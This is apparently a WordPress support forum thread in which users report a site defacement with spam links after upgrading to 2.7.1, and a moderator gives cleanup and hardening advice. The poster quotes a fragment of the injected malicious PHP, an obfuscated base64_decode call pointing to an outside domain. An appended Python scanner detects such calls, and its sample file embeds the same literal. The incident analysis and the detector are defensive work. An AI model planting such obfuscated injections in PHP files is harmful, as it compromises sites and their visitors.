• Hi, I don’t know exactly if this is the right place to post this.
    Anyway, since I upgraded to 2.7.1, after a couple of days, I cannot access the login page. A blank screen appears in which there are lots of ad links hidden in the source code: defacement. The only way to get the login screen is by redirection from /wp-admin/, but it is impossible from the typical /wp-login.php

    I hope you fix this vulnerability in the next versions.

    Thanks.

Viewing 7 replies - 1 through 7 (of 7 total)
  • What evidence do you have this is a WordPress vulnerability? This would be serious indeed if true and we all would want to know.

    Thread Starter culebras

    (@culebras)

    Well, I am not a computer expert. What I wrote is what a programmer friend explained to me. My wordpress site is https://www.culebras.tk and the login page is https://www.culebras.ardeenelinfierno.com/culebras/wp-login.php.

    You can see in it that no login box appears, and the wp-login.php is ok on my server, I even uploaded again all the wordpress files.

    Looking at the code, you can see lots of ad links injected in it.

    I hope you can find the problem in the code of my login page.

    Thanks.

    We have the same problem. Installed 2.7.1 to 89 domains on one server. We had no more than set them up in their default state and bam. Now we are getting blank pages, and have lots of weird spam crap in /opt.

    The server is out of control, and has to be formatted and re-installed. I know it’s wordpress because we have CentOS 5.2 running on hundreds of other machines, none of them got broken into except this one.

    Would love to provide you with forensics on the box, but somehow they got access to the root account and locked everyone off. I lack the time right now to boot the machine up with a boot disk and investigate it. From what I gathered right before the crash it has to do with the new plugin installer feature because it was generating lots of “out of field data” errors. Looks to me like someone wasn’t properly validating input on their php.

    I’m formatting the server now to install Drupal, or perhaps Joomla, and get this CMS issue handled. I’d like to have used wordpress but it just seems too insecure right now.

    Regards

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    Putting my Karnack the Psychic hat on, I predict that there will be a security vulnerability in WordPress 2.7.1! Or at least a proof of concept. That part is easy and I also predict the stock market will go up and down. A lot.

    @realisticone:

    I’m formatting the server now to install Drupal, or perhaps Joomla, and get this CMS issue handled. I’d like to have used wordpress but it just seems too insecure right now.

    That’s what’s referred to as an inflammatory statement, adding no value whatsoever to the conversation or topic. Much like most of my post right now, but I’ll try to be abstract.

    Okay, starting with the basics. Your server got compromised or you were running Apache in a blatantly insecure way. How do I know?

    Would love to provide you with forensics on the box, but somehow they got access to the root account and locked everyone off.

    The default installation for Apache is to start up as a non-privileged uid:gid. On my Ubuntu servers that’s www-data:www-data and that’s done in order to limit any compromises. If a PHP application runs amok or gets compromised, then you lose control of your web server files.

    That’s a bad scenario and lots of sites get defaced or spam-link-jacked up that way. But get root access via a PHP app? Possible if PHP or Apache was broken or installed incorrectly but the simpler answer is You’re Doing It All Wrong. Keeping up to date with patches is important and you slipped up somewhere.

    @culebras:

    I think we’d like to hear from you and find out what happened. As I mentioned at the beginning, there will be an exploit or proof of concept.

    I don’t know if that’s what occurred to you or not but any data that you can provide would help. If you don’t feel comfortable sharing on a public forum, then please consider sending info to [email protected]

    In the meanwhile, back up your files and database and please give this evolving and changing boilerplate a read.

    Read this

    https://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/

    And then read it again.

    Read this too

    https://codex.www.ads-software.com/Hardening_WordPress

    Upgrade to the latest version if you have not already. You need to see if there are any users added to WordPress that you don’t know about/don’t belong there.

    You need to go through your files and find where the spammy links are being added. If it’s in wp-config.php or some other file, you’ll need to make sure that is cleaned up before you can consider yourself good file wise. Look everywhere and use fresh copies of your WordPress installation, plugins, and themes.

    Look at your posts and comments and see if there are any spammy links there. You can export your whole blog to WXR and then examine the whole thing in your favorite text editor.

    Look at your server’s log files. If you are on a shared server, get help from your provider. You need to identify if this was a compromise of WordPress or your server. If you do not identify the entrance which the attacker got in, odds are they will be back.

    Once you have cleaned up your hacked blog, harden it so this does not happen again.

    Good luck.

    Thread Starter culebras

    (@culebras)

    Well, I want to give thanks to jdembowski for the answers, the links and the explanations. As I said before, I am a simple wordpress user, not an expert, so I am sorry if I am not calling things by the correct name. Also, my English is not very good so I am sorry about that too.

    By the way, I will take my time to read your explanations carefully and I will try to identify the problem. For example, the blank pages with ad scrap occur in other pages besides wp-config.php, and the plugins I install and upgrade frequently within wordpress's new feature. Anyway my wp theme is old, so I will check it with attention. I will ask for help from my friend, the one who shares the server with me.

    Anything I discover I will share here soon so that it can be useful for anybody.

    Thread Starter culebras

    (@culebras)

    Well, I have fixed all the problems. Thanks a lot to jdembowski, because in the link he offered was the solution:

    https://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/

    There was malicious code like:

    https://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/");

    at the beginning of many php files.

    I cleaned all the php files affected (all php in theme, almost all php in plugins). Then I downloaded again a fresh installation of wordpress, deleted everything on my server and I uploaded all the fresh and cleaned stuff.

    Speaking with the friend who shares the server with me, it looks like another friend who shares the server uploaded and installed some kind of application with some security holes. We are not sure if that was the reason wordpress was hacked. The truth is that was NOT a problem of wordpress.

    Anyway, if anybody else has this problem, following the instructions provided by jdembowski will very probably lead to a solution.

    Thanks a lot for the help.
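
Added example, not part of the original thread or of WordPress: a small Python scanner for the file check described above, which finds PHP files containing base64_decode() calls on string literals and shows what each literal decodes to. The function names and the two sample files are constructed for illustration; only the base64 literal comes from the post.

```python
import base64
import binascii
import os
import re
import tempfile

# base64_decode("...") with a literal argument; also accepts the curly quotes
# that forum software substitutes when such code is pasted into a post.
B64_CALL = re.compile(r"""base64_decode\s*\(\s*["'“”]([A-Za-z0-9+/=]{8,})["'“”]\s*\)""")

def scan_php_source(text):
    """Return [(line_number, decoded_text)] for each base64_decode literal."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in B64_CALL.finditer(line):
            try:
                raw = base64.b64decode(match.group(1), validate=True)
            except (binascii.Error, ValueError):
                continue  # not valid base64, so not this pattern
            findings.append((lineno, raw.decode("utf-8", errors="replace")))
    return findings

def scan_tree(root):
    """Walk root and return {relative_path: findings} for .php files with hits."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as handle:
                hits = scan_php_source(handle.read())
            if hits:
                report[os.path.relpath(path, root)] = hits
    return report

def demo():
    """Build a constructed two-file theme directory and scan it."""
    # Constructed sample: the PHP statement around the literal is invented.
    infected = ('<?php $u = "http://" . base64_decode("YW55cmVzdWx0cy5uZXQ=") . "/"; ?>\n'
                "<?php get_header(); ?>\n")
    clean = "<?php get_footer(); ?>\n"
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("header.php", infected), ("footer.php", clean)):
            with open(os.path.join(root, name), "w", encoding="utf-8") as handle:
                handle.write(body)
        return scan_tree(root)

if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, hits)
```

Legitimate plugins also call base64_decode(), so each hit needs a manual look before a file is treated as infected.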

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    culebras,

    Thanks for letting us know and good job tracking that down and taking care of it.

    Now you’ll have to provide assistance to more people here for when this happens to them

  • The topic ‘Defacement vulnerability in wordpress 2.7.1’ is closed to new replies.